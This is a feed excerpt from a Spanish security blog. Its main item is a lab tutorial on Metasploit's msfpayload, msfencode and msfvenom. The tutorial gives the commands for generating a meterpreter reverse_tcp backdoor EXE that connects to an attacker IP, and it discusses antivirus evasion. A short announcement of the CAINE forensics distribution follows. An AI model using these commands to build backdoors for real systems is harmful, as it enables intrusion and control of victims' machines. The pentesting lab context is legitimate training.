domain="http://www.blogger.com/atom/ns#">Parte 1</category><title>Metasploit: de ENCODING y PAYLOAD va la cosa (I)</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-1l3GcL2kEUg/UUsQgWOOeAI/AAAAAAAAELI/kvABny0aLn8/s1600/MSFPayload_parte1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://2.bp.blogspot.com/-1l3GcL2kEUg/UUsQgWOOeAI/AAAAAAAAELI/kvABny0aLn8/s640/MSFPayload_parte1.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div style="text-align: start;"&gt;
Con un titulo tan abierto con el que acabo de bautizar este "post", voy a celebrar el haber alcanzado los 700 seguidores en twitter (muchas gracias a todos por leer este blog y por estar ahí), y que mejor que hacerlo escribiendo un poco sobre #Metasploit Framework y #Pentesting.&lt;/div&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
En el artículo de hoy, además de jugar con los comandos msfpayload, msfencode y msfvenom del framework de #Metasploit, voy a presentar una nueva sección del Blog: &lt;b&gt;#ST2Labs&lt;/b&gt;&amp;nbsp;(&lt;span style="font-size: x-small;"&gt;El laboratorio de Seguridad para Todos&lt;/span&gt;).&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: start;"&gt;
&lt;span style="background-color: orange; border: none; color: #3a3a3a; font-family: Arial, sans-serif; font-size: 12px; line-height: 18px; list-style: none; margin: 0px; outline: none; padding: 0px;"&gt;&lt;span style="border: none; font-size: xx-small; list-style: none; margin: 0px; outline: none; padding: 0px;"&gt;&lt;b&gt;INDICE:&lt;/b&gt;&lt;span style="border: none; color: white; list-style: none; margin: 0px; outline: none; padding: 0px;"&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;a href="http://www.seguridadparatodos.es/2013/03/Metasploit-Encoding-payloads.html" style="border: none; color: white; list-style: none; margin: 0px; outline: none; padding: 0px; text-decoration: none;" target="_blank"&gt;Parte 1&lt;/a&gt;&lt;span style="border: none; color: white; list-style: none; margin: 0px; outline: none; padding: 0px;"&gt;&amp;nbsp;|&amp;nbsp;&lt;/span&gt;&lt;a href="http://www.seguridadparatodos.es/2013/03/Metasploit-Encoding-payload2.html" style="border: none; color: white; list-style: none; margin: 0px; outline: none; padding: 0px; text-decoration: none;" target="_blank"&gt;Parte 2&lt;/a&gt;&lt;span style="border: none; color: white; list-style: none; margin: 0px; outline: none; padding: 0px;"&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://www.seguridadparatodos.es/2013/03/Metasploit-Encoding-payload3.html" target="_blank"&gt;Parte 3&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="border: none; color: white; list-style: none; margin: 0px; outline: none; padding: 0px;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;¿Qué son y para que sirven?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Para saber qué son estos comandos y para que sirven que mejor que hacerlo con ejemplos ¿no&amp;nbsp;creéis?&amp;nbsp;, pero antes voy a poner una pequeña descripción de cada uno de ellos:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;msfpayload&lt;/b&gt;:&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Es un comando que permite convertir cualquier PAYLOAD en un elemento independiente y con autonomía propia, por ejemplo un ejecutable EXE (windows), un ejecutable de Linux, o quizás un fragmento de código en una librería dinámica (DLL), etc.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-5ruKQgsLnh0/UUrkEQ-d_RI/AAAAAAAAEJQ/V5Bc4Vw7m_Y/s1600/MSF_payload-help.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="194" src="http://1.bp.blogspot.com/-5ruKQgsLnh0/UUrkEQ-d_RI/AAAAAAAAEJQ/V5Bc4Vw7m_Y/s640/MSF_payload-help.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;msfpayload help&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;msfencode:&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Aplica técnicas de evasión de IDS/IPS y Antivirus a un PAYLOAD en bruto (raw) para generar un elemento independiente y&amp;nbsp;autónomo, como por ejemplo: ejecutable (EXE), JAVA, DLL, vba, ASP, etc.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Este comando aumenta el número y tipo de archivos que genera, incluso permite crear un ejecutable EXE utilizando como "template" (plantilla) otro; Ejemplo utilizar calc.exe para generar una versión con un backdoors del tipo meterpreter.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-Qw0UmIvsIyQ/UUrl3r7yIQI/AAAAAAAAEJg/5Axwh2fAbdY/s1600/MSF_encode-help.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="392" src="http://2.bp.blogspot.com/-Qw0UmIvsIyQ/UUrl3r7yIQI/AAAAAAAAEJg/5Axwh2fAbdY/s640/MSF_encode-help.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;msfencode help&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;msfvenom&lt;/b&gt;:&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Es la unión de msfpayload y msfencode en un solo comando, mayor velocidad y simplicidad a la hora de generar los PAYLOAD y aplicarle técnicas de evasión.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Pero tiene algunas limitaciones, por ejemplo, no tiene la capacidad de aplicar varias técnicas de evasión sobre el mismo PAYLOAD, como veremos más adelante en nuestros ejemplos.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-tQg6viFeIQs/UUrnT4Jl4vI/AAAAAAAAEJs/76FtctY9SXY/s1600/MSF_venom-help.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="284" src="http://1.bp.blogspot.com/-tQg6viFeIQs/UUrnT4Jl4vI/AAAAAAAAEJs/76FtctY9SXY/s640/MSF_venom-help.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;msfvenom help&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Ejemplos de USO&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
En nuestro laboratorio de pruebas (ST2Labs) contamos con dos máquinas virtuales, la &lt;u&gt;primera&lt;/u&gt; de ellas tiene instalado &lt;a href="http://www.seguridadparatodos.es/2013/03/preparando-kali-aka-backtrack-6-linux.html" target="_blank"&gt;Kali Linux&lt;/a&gt; con #Metasploit y la &lt;u&gt;segunda&lt;/u&gt; cuenta con un Windows XP SP3, que servirá posteriormente para poner a prueba los PAYLOADs generados.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-kDEryundpz0/UUrrBdHCA9I/AAAAAAAAEKA/kveDPCmn3aU/s1600/ST2Labs_vmware.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="230" src="http://4.bp.blogspot.com/-kDEryundpz0/UUrrBdHCA9I/AAAAAAAAEKA/kveDPCmn3aU/s640/ST2Labs_vmware.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;ST2Labs - Entorno de trabajo.&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
Una vez preparado el entorno de trabajo, se esta en condiciones de empezar con los ejemplos. Empezaremos desde más sencillo e iremos aumentando la complejidad progresivamente. Utilizaremos &lt;a href="https://www.virustotal.com/es/" target="_blank"&gt;Virtustotal&lt;/a&gt; para poner a prueba las técnicas de evasión utilizadas.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;u&gt;&lt;b&gt;Ejemplo 1:&lt;/b&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Creación de un backdoor del tipo meterpreter, sin encoding (ofuscación del código), y que este preparado para generar una conexión con origen en la victima y destino el atacante, también conocido como reverse_tcp.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&amp;gt;&amp;gt; Paso 1:&lt;/b&gt; Elección del PAYLOAD, listar los PAYLOAD disponibles.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="background-color: #eeeeee;"&gt;&lt;b&gt;root@ST2Labs &lt;/b&gt;&amp;gt; msfpayload -l&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-OPD8CvZl4qQ/UUrtc3FGAqI/AAAAAAAAEKM/7miy9zIKvOQ/s1600/MSF_payload-list.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="392" src="http://2.bp.blogspot.com/-OPD8CvZl4qQ/UUrtc3FGAqI/AAAAAAAAEKM/7miy9zIKvOQ/s640/MSF_payload-list.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;msfpayload -l [Listar los PAYLOAD disponibles]&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
Como se puede observar en la imagen superior, se tienen a nuestra disposición unos 256 payload diferentes, ordenados según el sistema operativo. Incluso existen PAYLOAD&amp;nbsp;específicos&amp;nbsp;para Windows x64.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Puesto que nuestro equipo de laboratorio es un Windows XP SP3 x86 (32bits), nos centraremos en dichos payload, por lo que se puede utilizar el comando grep para filtrar los resultados y mostrar solamente los que contengan la palabra windows.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="background-color: #eeeeee;"&gt;&lt;b&gt;root@ST2Labs&lt;/b&gt; &amp;gt; msfpayload -l | grep windows | grep reverse&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
Con el comando anterior listamos los PAYLOAD que contienen la palabra windows y reverse, que nos interesa para crear nuestro PAYLOAD con conexión inversa.&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;gt;&amp;gt; Paso 2:&lt;/b&gt; Una vez elegido el PAYLOAD (windows/patchupmeterpreter/reverse_tcp), vamos a ver las opciones (variables) de configuración que se necesitan, para ello se añade la letra O al final:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; text-align: justify;"&gt;&lt;b&gt;root@ST2Labs&lt;/b&gt; &amp;gt; msfpayload windows/patchupmeterpreter/reverse_tcp O&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; text-align: justify;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-b26PbQNqiOM/UUrxqmveoBI/AAAAAAAAEKg/QtdrP3vlWLI/s1600/MSF_payload-1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="396" src="http://3.bp.blogspot.com/-b26PbQNqiOM/UUrxqmveoBI/AAAAAAAAEKg/QtdrP3vlWLI/s640/MSF_payload-1.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;msfpayload [Opciones del PAYLOAD escogido]&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;b&gt;&amp;gt;&amp;gt; Paso 3:&lt;/b&gt; Configuración de las variables /&amp;nbsp;parámetros&amp;nbsp;del PAYLOAD seleccionado, se cambiará el metodo de EXITFUNC a seh, y se introducirá la IP del atacante (KALI linux) 192.168.2.105, tal que así:&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; text-align: justify;"&gt;&lt;b&gt;root@ST2Labs &lt;/b&gt;&amp;gt; msfpayload windows/patchupmeterpreter/reverse_tcp EXITFUNC=seh LHOST=192.168.2.105 O&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; text-align: justify;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;b&gt;&amp;gt;&amp;gt; Paso 4&lt;/b&gt;: Una vez comprobado que se han configurado bien los parámetros, cambiamos la letra O, por el tipo de archivo / programa que deseamos generar, en este caso un ejecutable EXE, por lo que utilizamos la letra X.&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; text-align: justify;"&gt;&lt;b&gt;root@ST2Labs&lt;/b&gt; &amp;gt; msfpayload windows/patchupmeterpreter/reverse_tcp EXITFUNC=seh LHOST=192.168.2.105 X &amp;gt; backdoor1.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-PztN3acQpQo/UUrzbVVWaPI/AAAAAAAAEKs/jRZoc_Y72uA/s1600/MSF_payload-2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="116" src="http://1.bp.blogspot.com/-PztN3acQpQo/UUrzbVVWaPI/AAAAAAAAEKs/jRZoc_Y72uA/s640/MSF_payload-2.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;msfpayload [Generación de un ejecutable EXE]&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div&gt;
&lt;b&gt;&amp;gt;&amp;gt; Paso 5&lt;/b&gt;: Comprobar la detección de los Antivirus&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Ahora se puede comprobar que sin utilizar&amp;nbsp;ningún&amp;nbsp;tipo de ENCODING o técnica de ofuscación del código generado, el Antivirus puede detectarlo sin problema alguno, para ello voy a subir a virtustotal el EXE (backdoor1.exe) y comprobarlo.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-hTxkz8ijYlw/UUr03DcDomI/AAAAAAAAEK4/6fFg3RtXfOA/s1600/MSF_payload-vt-1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="248" src="http://3.bp.blogspot.com/-hTxkz8ijYlw/UUr03DcDomI/AAAAAAAAEK4/6fFg3RtXfOA/s640/MSF_payload-vt-1.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;VirusTotal - comprobación del archivo backdoor1.exe&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Coincide con una firma ya subida con anterioridad a la web de virustotal, y se puede ver que efectivamente es detectado por la mayoría de los motores de antivirus ! Es necesario por tanto introducir técnicas de encoding ¡&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
¿Tendremos éxito evadiendo el sistema antivirus? O por el contrario todo los fabricantes de antivirus se han puesto las pilas y han incluido todas las firmas que se pueden generar con el framework #Metasploit&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Esto lo veremos en el siguiente artículo.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: x-small;"&gt;&amp;gt;ST2Labs&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
#Pentesting #Rulez&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-S1Nt6dDSSCI/UUsSlA9bZcI/AAAAAAAAELQ/6LF8YsFGUSo/s1600/ST2Labs_botton_head.png" imageanchor="1" style="background-color: black; clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-S1Nt6dDSSCI/UUsSlA9bZcI/AAAAAAAAELQ/6LF8YsFGUSo/s1600/ST2Labs_botton_head.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=q34SxRxCVD0:l1s--AJ84Cg:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=q34SxRxCVD0:l1s--AJ84Cg:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=q34SxRxCVD0:l1s--AJ84Cg:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=q34SxRxCVD0:l1s--AJ84Cg:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=q34SxRxCVD0:l1s--AJ84Cg:dnMXMwOfBR0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=dnMXMwOfBR0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=q34SxRxCVD0:l1s--AJ84Cg:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=q34SxRxCVD0:l1s--AJ84Cg:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=q34SxRxCVD0:l1s--AJ84Cg:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=q34SxRxCVD0:l1s--AJ84Cg:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=q34SxRxCVD0:l1s--AJ84Cg:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SXato2/~4/q34SxRxCVD0" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SXato2/~3/q34SxRxCVD0/Metasploit-Encoding-payloads.html</link><author>noreply@blogger.com (Julián Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-1l3GcL2kEUg/UUsQgWOOeAI/AAAAAAAAELI/kvABny0aLn8/s72-c/MSFPayload_parte1.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadparatodos.es/2013/03/Metasploit-Encoding-payloads.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-2377487198486921922</guid><pubDate>Tue, 19 Mar 2013 09:21:00 +0000</pubDate><atom:updated>2013-03-21T11:15:36.597+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">ST2Labs</category><category domain="http://www.blogger.com/atom/ns#">Forensics</category><category domain="http://www.blogger.com/atom/ns#">Linux</category><category domain="http://www.blogger.com/atom/ns#">Noticias</category><category domain="http://www.blogger.com/atom/ns#">IT Security</category><category domain="http://www.blogger.com/atom/ns#">CAINE</category><title>C.A.I.N.E 4.0 (codename PULSAR) | Lista para su Descarga</title><description>&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;a href="http://4.bp.blogspot.com/-lUdj5jVRzoM/UUgmv8lZ6TI/AAAAAAAAEIs/Bbx6osCWgfg/s1600/CAINE_4.0.Head.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-lUdj5jVRzoM/UUgmv8lZ6TI/AAAAAAAAEIs/Bbx6osCWgfg/s1600/CAINE_4.0.Head.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h2 style="background-color: #1a1a1a; color: #f3a424; font-family: 'Lucida Grande', Lucida, Verdana, sans-serif; font-size: 1em; font-weight: normal; line-height: 15px; margin: 0px;"&gt;
C.A.I.N.E (Computer Aided Investigative Environment)&lt;/h2&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;¿Qué es C.A.I.N.E?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Es una distribución de Linux especialmente orientada al&amp;nbsp;análisis&amp;nbsp;forense informático. Esta distribución lleva de fabrica pre-instaladas cientos de aplicaciones destinadas a facilitar la tarea del analista forense. Además ofrece:&lt;/div&gt;
&lt;div&gt;
&lt;ul&gt;
&lt;li&gt;Entorno de trabajo perfectamente orientado a completar las fases de la metodología forense.&lt;/li&gt;
&lt;li&gt;Interfaz gráfica amigable&lt;/li&gt;
&lt;li&gt;Proceso semi-automático&amp;nbsp;en la generación del Informe final de resultados.&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Novedades&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
En la versión 4.0 trae la siguientes novedades con respecto a su anterior versión:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Actualización del Kernel de Linux:&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Kernel 3.2.0-38&lt;/li&gt;
&lt;/ul&gt;
Se han añadido a la distribución las siguientes aplicaciones:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;
&lt;li&gt;LibreOffice 4.0.1&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Sqliteman&lt;/li&gt;
&lt;li&gt;Remote Filesystem Mounter&amp;nbsp;&lt;/li&gt;
&lt;li&gt;sdparm&amp;nbsp;&lt;/li&gt;
&lt;li&gt;netdiscover&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;b style="font-size: x-large;"&gt;Lista de Aplicaciones&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
De entre todas las aplicaciones disponibles vamos a destacar las siguientes:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;u&gt;Foremost&lt;/u&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Foremost is a console program to recover files based on their headers, footers, and internal data structures. Foremost can work on image files, such as those generated by dd, Safeback, Encase, etc, or directly on a drive.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
